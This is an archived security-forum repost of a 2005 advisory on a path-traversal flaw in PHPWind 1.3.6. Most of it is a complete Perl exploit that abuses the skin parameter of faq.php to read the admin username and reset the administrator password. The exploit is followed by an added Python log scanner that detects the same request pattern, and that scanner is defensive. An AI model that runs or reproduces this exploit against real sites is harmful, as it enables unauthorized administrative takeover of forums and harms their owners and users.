EvilOctal Security Team Technical Discussion Group's Archiver

EvilOctal 2005-1-12 02:18

[Repost] PHPWind Skin Vulnerability

Source: [url]www.securiteam.com[/url]

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: [url]http://www.securiteam.com[/url]

PHPWind Skin Vulnerability (Exploit)
------------------------------------------------------------------------


SUMMARY

Due to a vulnerability in the way PHPWind handles user provided input, a
remote attacker can cause PHPWind to include an external file (in our case
the admin.php file). Once this external file has been included a remote
attacker can retrieve the administrative password of the PHPWind program.

DETAILS

Vulnerable Systems:
* PHPWind version 1.3.6 and prior

Immune Systems:
* PHPWind version 2.0.2 or newer

Exploit:

[code]#!/usr/bin/perl
#Phpwind 1.3.6 skin exploit
#Code by Alpha (netsh@163.com)
#Welcome To http://www.cnwill.com/
#You can find the Message about this bug @
#http://www.54hack.info/txt/phpwind.doc

use IO::Socket;

system('cls');

if (@ARGV != 4) {
print "\n";
print "*****************************************************\n";
print "Thanks use this programme\n";
print "This is Phpwind 1.3.6 admin password exploit.\n\n";
print "Usage: \n $0 host port path adminpass \n\n";
print "e.g :\n $0 www.*.com 80 /bbs/ alpha\n";
print " $0 bbs.*.com 80 / alpha\n\n";
print "Code by Alpha,Welcome to WWW.CNWILL.COM!!\n";
print "*****************************************************\n";
exit(1);
}

$host = $ARGV[0];
$port = $ARGV[1];
$path = $ARGV[2];
$adminpass = $ARGV[3];

print "###### CODE BY Alpha,Welcome to WWW.CNWILL.COM ######\n\n";
# First request: the skin parameter is abused to include the admin/manager template
$req = "GET $path"."faq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1\n".
"Host: $host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";


#print "$req1";
#exit;
print "###### Waitting,WE are getting the adminname...........\n\n";
@res = &connect;
#print @res;

# Pull the admin name out of the returned form
$aaa = join ('',@res);
$po = index ($aaa, "name=username");
#print "$po\n";
$bbb = substr ($aaa,$po+28, $po+50);
@array = split("><",$bbb);
$adminname = $array[0];

print "###### Oh,WE got the adminname and it is $adminname\n\n";
print "###### Waitting,WE are charging the adminpassword as $adminpass................\n\n";


# Second request: submit the new password through the included manager page
$req = "GET $path"."faq.php?skin=../../admin/manager&username=$adminname&password=$adminpass&check_pwd=$adminpass&action=go HTTP/1.1\n".
"Host: $host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";


@res1 = &connect;

print "###### OK ,Now you can login as adminuser:$adminname and password:$adminpass @ \n\n###### $host$path"."admin.php \n\n###### GOOD LUCK,Welcome to WWW.CNWILL.COM!!\n";


# Open a TCP connection, send the current $req and return the response lines
sub connect{
my $connection = IO::Socket::INET->new(Proto =>"tcp",
                      PeerAddr =>$host,
                      PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

print $connection $req;

my @res = <$connection>;
close $connection;
return @res;

}[/code]


ADDITIONAL INFORMATION

The information has been provided by Alpha <netsh@163.com>.
The original article can be found at:
[url]http://www.54hack.info/txt/phpwind.doc[/url]
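
Defender-side detection for the request pattern this advisory describes, added here as an example that is not part of the original advisory or of PHPWind's code. It scans constructed Apache combined-format access-log lines (sample data, not real traffic) for faq.php requests whose skin parameter escapes a plain skin name, decoding URL encoding first, and labels the follow-up stage (username/password/action=go on the same included page) separately so a responder can tell a probe from an attempted takeover.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2005:02:18:01 +0800] "GET /bbs/faq.php?skin=default HTTP/1.1" 200 5123
10.0.0.7 - - [12/Jan/2005:02:18:09 +0800] "GET /bbs/faq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1" 200 9870
10.0.0.7 - - [12/Jan/2005:02:18:15 +0800] "GET /bbs/faq.php?skin=..%2F..%2Fadmin%2Fmanager&username=admin&password=x&check_pwd=x&action=go HTTP/1.1" 200 211
10.0.0.9 - - [12/Jan/2005:02:19:00 +0800] "GET /bbs/index.php HTTP/1.1" 200 4000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# A legitimate skin name is a single path component: no slashes, dots or NULs.
SAFE_SKIN = re.compile(r'^[A-Za-z0-9_-]+$')


def classify(target):
    """Label one request target, or return None if it looks benign."""
    parts = urlsplit(target)
    if not parts.path.endswith('/faq.php'):
        return None
    # Decode twice so %2F and %252F variants do not hide the traversal.
    query = parse_qs(unquote(unquote(parts.query)), keep_blank_values=True)
    skins = query.get('skin', [])
    if not any(SAFE_SKIN.match(s) is None for s in skins):
        return None
    # Second stage of the advisory's chain: credentials pushed through the included page.
    if query.get('action') == ['go'] and 'password' in query:
        return 'skin-traversal+admin-login-attempt'
    return 'skin-traversal'


def scan_log(text):
    """Return (client_ip, label) for every suspicious request in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m.group('target'))
        if label:
            findings.append((m.group('ip'), label))
    return findings


if __name__ == '__main__':
    for ip, label in scan_log(SAMPLE_LOG):
        print(ip, label)
```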

© 1999-2008 EvilOctal Security Team